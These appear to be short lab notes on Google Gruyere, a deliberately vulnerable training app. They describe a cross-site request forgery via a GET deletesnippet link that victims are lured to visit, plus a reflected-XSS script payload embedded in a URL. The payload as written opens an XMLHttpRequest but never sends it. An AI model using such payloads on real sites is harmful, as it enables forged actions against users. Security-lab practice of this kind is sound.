- Register a user and add a snippet - https://google-gruyere.appspot.com/$ID/deletesnippet?index=0 - Convince the user to visit the above link, which deletes their own post Note that the issue could also be triggered via Reflected or Stored XSS in a rendered page - Find a Reflected XSS issue e.g. https://google-gruyere.appspot.com/$ID/<script>var xhr = new XMLHttpRequest();xhr.open('GET', "https://google-gruyere.appspot.com/$ID/deletesnippet?index=0", true);</script>